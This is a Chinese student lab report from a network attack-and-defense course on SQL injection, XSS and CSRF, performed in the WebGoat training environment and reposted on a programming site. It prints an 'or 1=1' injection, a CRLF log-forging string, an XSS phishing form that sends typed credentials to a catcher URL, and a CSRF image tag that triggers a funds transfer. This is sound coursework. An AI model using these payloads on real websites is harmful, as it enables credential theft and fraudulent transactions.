2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础

2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础,第1张

概述目录 Exp9: Web安全基础 一、基础知识 1.SQL注入攻击 2.XSS跨站脚本攻击 3.CSRF跨站请求伪造 二、SQL注入 1. 命令注入 2. 数字注入 3. 日志欺骗 三、XSS攻击 1. XSS钓鱼攻击 四、CSRF攻击 1. 跨站请求伪造 五、实验总结与体会 Exp9: Web安全基础 一、基础知识 1.SQL注入攻击 基本原理: 就是不法分子利用编程漏洞,通过表单输入特殊字符和

目录

Exp9: Web安全基础
一、基础知识 1.SQL注入攻击 2.XSS跨站脚本攻击 3.CSRF跨站请求伪造 二、SQL注入 1. 命令注入 2. 数字注入 3. 日志欺骗 三、XSS攻击 1. XSS钓鱼攻击 四、CSRF攻击 1. 跨站请求伪造 五、实验总结与体会
Exp9: Web安全基础
一、基础知识 1.sql注入攻击 基本原理: 就是不法分子利用编程漏洞,通过表单输入特殊字符和恶意sql代码,使得后台执行SQL查询时,对数据库产生不可预知或不可逆的攻击或破坏。 防御方法: 避免不必要的表单提交页面。 对表单输入进行控制,如:限制字符类型,限制字符长度等 在数据库层利用授权机制,限制数据库 *** 作行为。 2.XSS跨站脚本攻击 基本原理: 攻击者利用网站漏洞,将恶意脚本代码通过注入,或者其他方式发送或存储到服务器中,通过利用用户对于浏览器的信任,当正常用户访问该服务器时就会受到脚本攻击,例如获得该用户的cookie或其他信息等。 防御方法: 用户尽量不要保存自己在浏览器中输入的用户名和密码 网站开发人员应该对用户上传的数据进行一定的过滤 对输入表单进行控制 3.CSRF跨站请求伪造 基本原理: 当用户访问网站A时输入用户名和密码,在通过验证后,网站A产生cookie信息并返回,此时登录网站A成功,可正常发送请求到网站A。在未退出网站A前,若访问另一个恶意网站B,网站B可返回一些攻击性代码并请求访问网站A;因此在网站B的请求下,向网站A发出请求。但网站A不知道该请求恶意的,因此还是会执行该恶意代码。 防御方法: 验证请求中的Token 验证Referer 添加随机验证 设定cookie域 二、sql注入 1. 命令注入 攻击过程:在表单提交中传入恶意命令数据,使其在服务器端执行。 实验过程: 在页面中点击鼠标右键,选择inspect Element 按键盘f12查看网页源代码

点击vIEw按钮,执行代码结果如下:

2. 数字注入 攻击过程:在表单输入中输入数字生成永真式,使得注入的SQL语句必定可以执行。 实验过程: 在实验网页上查看源代码,对value=‘101‘进行修改,添加or 1=1构成永真式,如图:

点击按钮执行,结果如下:

3. 日志欺骗 攻击过程:不法分子通过在注入脚本,通过脚本修改日志文件。 实验过程: 在实验环境提供的表单中输入2329%0d%0aLogin Succeeded for username: 162329其中%0d%0a为回车符和换行符。 结果如下图:

三、XSS攻击 1. XSS钓鱼攻击 攻击过程:通过表单输入脚本,修改网页HTML,生成钓鱼网站,当用户输入时获取用户输入的信息。 实验过程: 在实验环境表单中输入脚本代码,构造钓鱼界面。 界面代码如下:
<form><br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" ID="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> </form><br><br><HR><script>function Hack(){  alert("Had this been a real attack... Your credentials were just stolen." User name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);  XSSImage=new Image;  XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ";}</script>
将以上代码输入搜索框中,点击搜索如图:

当用户点击提交时攻击者界面会出现如下图:

四、CSRF攻击 1. 跨站请求伪造 攻击过程: 给用户发送一个恶意URL诱使其他用户点击,从而触发CSRF攻击。为了使用户更容易受骗,我们可以以图片的形式隐藏URL。 实验过程: 查看参数中src和menu值,为261和900 在message框中输入<img src="http://localhost:8080/WebGoat/attack? Screen=261&menu=900&transferFunds=2329"/>点击提交后结果如下:

当用户点击Message字段中的图片时就会盗取用户2329元 五、实验总结与体会

通过本次实验真实的感受了什么是sql注入,XSS攻击和CRSF攻击,在实验中了解了其中的流程,也自己总结了对这些攻击的防御方法,感觉受益匪浅。

总结

以上是内存溢出为你收集整理的2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础全部内容,希望文章能够帮你解决2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/web/1075981.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-26
下一篇 2022-05-26

发表评论

登录后才能评论

评论列表(0条)

保存